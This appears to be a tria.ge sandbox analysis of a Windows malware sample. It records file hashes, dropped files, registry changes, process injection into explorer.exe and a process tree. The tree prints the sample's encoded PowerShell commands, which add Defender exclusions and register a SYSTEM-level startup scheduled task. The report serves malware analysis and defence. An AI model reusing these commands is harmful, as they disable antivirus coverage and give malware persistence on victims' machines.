Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
299s -
max time network
303s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
17/09/2022, 10:23
Static task
static1
Behavioral task
behavioral1
Sample
af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe
Resource
win10-20220901-en
General
-
Target
af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe
-
Size
2.5MB
-
MD5
0119f6316586f89f83c24254c6927dd9
-
SHA1
eb462b622d6038638889154839238105a17f508b
-
SHA256
af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e
-
SHA512
f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653
-
SSDEEP
49152:35mGlO0aBsajwiCzLaeG862uwnYn9fRLdrAoVMkTEHMUHqyuWoG:0G8/Bspp/p+3rjspTj
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4864 qwfqwf.exe 4576 explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qwfqwf.exe.log qwfqwf.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\4BFD.tmp qwfqwf.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4864 set thread context of 4576 4864 qwfqwf.exe 81 -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\qwfqwf.exe af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe File opened for modification C:\Program Files\qwfqwf.exe af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe File created C:\Program Files\Google\Libs\WR64.sys qwfqwf.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" qwfqwf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" qwfqwf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" qwfqwf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ qwfqwf.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3340 powershell.exe 3340 powershell.exe 3340 powershell.exe 3044 powershell.exe 3044 powershell.exe 3044 powershell.exe 2484 af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe 3160 powershell.exe 3160 powershell.exe 3160 powershell.exe 900 powershell.exe 900 powershell.exe 900 powershell.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe 4576 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3340 powershell.exe Token: SeIncreaseQuotaPrivilege 3340 powershell.exe Token: SeSecurityPrivilege 3340 powershell.exe Token: SeTakeOwnershipPrivilege 3340 powershell.exe Token: SeLoadDriverPrivilege 3340 powershell.exe Token: SeSystemProfilePrivilege 3340 powershell.exe Token: SeSystemtimePrivilege 3340 powershell.exe Token: SeProfSingleProcessPrivilege 3340 powershell.exe Token: SeIncBasePriorityPrivilege 3340 powershell.exe Token: SeCreatePagefilePrivilege 3340 powershell.exe Token: SeBackupPrivilege 3340 powershell.exe Token: SeRestorePrivilege 3340 powershell.exe Token: SeShutdownPrivilege 3340 powershell.exe Token: SeDebugPrivilege 3340 powershell.exe Token: SeSystemEnvironmentPrivilege 3340 powershell.exe Token: SeRemoteShutdownPrivilege 3340 powershell.exe Token: SeUndockPrivilege 3340 powershell.exe Token: SeManageVolumePrivilege 3340 powershell.exe Token: 33 3340 powershell.exe Token: 34 3340 powershell.exe Token: 35 3340 powershell.exe Token: 36 3340 powershell.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeIncreaseQuotaPrivilege 3044 powershell.exe Token: SeSecurityPrivilege 3044 powershell.exe Token: SeTakeOwnershipPrivilege 3044 powershell.exe Token: SeLoadDriverPrivilege 3044 powershell.exe Token: SeSystemProfilePrivilege 3044 powershell.exe Token: SeSystemtimePrivilege 3044 powershell.exe Token: SeProfSingleProcessPrivilege 3044 powershell.exe Token: SeIncBasePriorityPrivilege 3044 powershell.exe Token: SeCreatePagefilePrivilege 3044 powershell.exe Token: SeBackupPrivilege 3044 powershell.exe Token: SeRestorePrivilege 3044 powershell.exe Token: SeShutdownPrivilege 3044 powershell.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeSystemEnvironmentPrivilege 3044 powershell.exe Token: SeRemoteShutdownPrivilege 3044 powershell.exe Token: SeUndockPrivilege 3044 powershell.exe Token: SeManageVolumePrivilege 3044 powershell.exe Token: 33 3044 powershell.exe Token: 34 3044 powershell.exe Token: 35 3044 powershell.exe Token: 36 3044 powershell.exe Token: SeIncreaseQuotaPrivilege 3044 powershell.exe Token: SeSecurityPrivilege 3044 powershell.exe Token: SeTakeOwnershipPrivilege 3044 powershell.exe Token: SeLoadDriverPrivilege 3044 powershell.exe Token: SeSystemProfilePrivilege 3044 powershell.exe Token: SeSystemtimePrivilege 3044 powershell.exe Token: SeProfSingleProcessPrivilege 3044 powershell.exe Token: SeIncBasePriorityPrivilege 3044 powershell.exe Token: SeCreatePagefilePrivilege 3044 powershell.exe Token: SeBackupPrivilege 3044 powershell.exe Token: SeRestorePrivilege 3044 powershell.exe Token: SeShutdownPrivilege 3044 powershell.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeSystemEnvironmentPrivilege 3044 powershell.exe Token: SeRemoteShutdownPrivilege 3044 powershell.exe Token: SeUndockPrivilege 3044 powershell.exe Token: SeManageVolumePrivilege 3044 powershell.exe Token: 33 3044 powershell.exe Token: 34 3044 powershell.exe Token: 35 3044 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 2484 wrote to memory of 3340 2484 af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe 66 PID 2484 wrote to memory of 3340 2484 af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe 66 PID 2484 wrote to memory of 3044 2484 af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe 69 PID 2484 wrote to memory of 3044 2484 af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe 69 PID 2484 wrote to memory of 4108 2484 af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe 72 PID 2484 wrote to memory of 4108 2484 af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe 72 PID 4108 wrote to memory of 4240 4108 cmd.exe 74 PID 4108 wrote to memory of 4240 4108 cmd.exe 74 PID 4864 wrote to memory of 3160 4864 qwfqwf.exe 76 PID 4864 wrote to memory of 3160 4864 qwfqwf.exe 76 PID 4864 wrote to memory of 900 4864 qwfqwf.exe 78 PID 4864 wrote to memory of 900 4864 qwfqwf.exe 78 PID 4864 wrote to memory of 8 4864 qwfqwf.exe 80 PID 4864 wrote to memory of 8 4864 qwfqwf.exe 80 PID 4864 wrote to memory of 8 4864 qwfqwf.exe 80 PID 4864 wrote to memory of 4576 4864 qwfqwf.exe 81 PID 4864 wrote to memory of 4576 4864 qwfqwf.exe 81 PID 4864 wrote to memory of 4576 4864 qwfqwf.exe 81
Processes
-
C:\Users\Admin\AppData\Local\Temp\af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe"C:\Users\Admin\AppData\Local\Temp\af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBtAHQAIwA+ACAAQAAoACAAPAAjAGEAdABzACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlAGgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAaABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwBlACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABxAHcAZgBxAHcAZgAuAGUAeABlACIAJwApACAAPAAjAHAAaQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHIAcgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHIAYwB0AHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAHEAdwBmAHEAdwBmACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQBuACMAPgA7AA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "qwfqwf"2⤵
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\system32\schtasks.exeschtasks /run /tn "qwfqwf"3⤵PID:4240
-
-
-
C:\Program Files\qwfqwf.exe"C:\Program Files\qwfqwf.exe"1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAYgBtAHQAIwA+ACAAQAAoACAAPAAjAGEAdABzACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBlAGgAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAaABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwBlACMAPgA="2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZwAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABxAHcAZgBxAHcAZgAuAGUAeABlACIAJwApACAAPAAjAHAAaQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHIAcgAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHIAYwB0AHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAHEAdwBmAHEAdwBmACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQBuACMAPgA7AA=="2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:900
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "dplckqvqeii"2⤵PID:8
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe oiwyeszwfgcchj0 XofLACsdV31j9ZQMDeZoqGi8Jt8J9pT+LaLT9/h7mc2lwG87CaVN5EzLnei9FHVsjt/hBqk2cTgsmCQzP63vQgf+54VyKHwwH69NepkH8M2stSb71uK1KIJJmTYhpCUFgEOsuzY0niiQhO4IOHEE9e4sENaUmjYuxDw5wrLuyC8LykQtm4N+vgPtPiXrgni2TUdtqXmIDR4R+72aCV7DHwsbx1WEqZrFFqJymbMq1JZVnZbh+OEPkwxlN7+zLObs1FTuo2sWS54ALgasRhnsT7kWRUUmlyabrkMK2DQmwu3LW0d6p7k8lJ5VMjQ/Cjfpy1KQsqtQ4oDh8dL288eS3kSVSx4v69CksqYI4pJt2Y4KBNDs/GHeKAzo6Bc9UNzCMef/jPbcIDe3Yp/2LYV30gzhg5rQINuyoxM58Mu8THf4E8smMaTwy1yf3v0rAXnQmaDr2jTmVoyq4UNdb8issfE5UQm2tLrv+MzA/f/rHvLGjTkGxL+MU70e1VSwZSudke4N28PyHGuhSiTevP6g3A==2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4576
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD50119f6316586f89f83c24254c6927dd9
SHA1eb462b622d6038638889154839238105a17f508b
SHA256af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e
SHA512f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653
-
Filesize
2.5MB
MD50119f6316586f89f83c24254c6927dd9
SHA1eb462b622d6038638889154839238105a17f508b
SHA256af97fde8931fbbcf9effb00c7987927416dacfc74bbac77eba6199b5d7dbfd1e
SHA512f864b04c6906abd03db89d85d9fde4cf7a35078fac9dbc51ba2285adc8bbc4e5d46cb351b4d6ad59bf04949ec851571f655a09fb2322709c06357daae8283653
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
1KB
MD5edfe53d946955f3d8b879ea0a696c7bc
SHA1636d2a5429b39fcb41dc0b4a977adcb0acfd5522
SHA2563e4fcf3a794d68b42ba9b48162571f7076c65b2edf8a643258a8cc777ad054ea
SHA5121107360413a9c603e12168cef5354e6353ef0645710a510be8fa36b7603b6eaf593bdc278ccc17215c2338f3076540f6228bdd96e2a14068669155d2c9c8293d
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD5811d351aabd7b708fef7683cf5e29e15
SHA106fd89e5a575f45d411cf4b3a2d277e642e73dbb
SHA2560915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18
SHA512702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5302a7c179ef577c237c5418fb770fd27
SHA1343ef00d1357a8d2ff6e1143541a8a29435ed30c
SHA2569e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f
SHA512f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699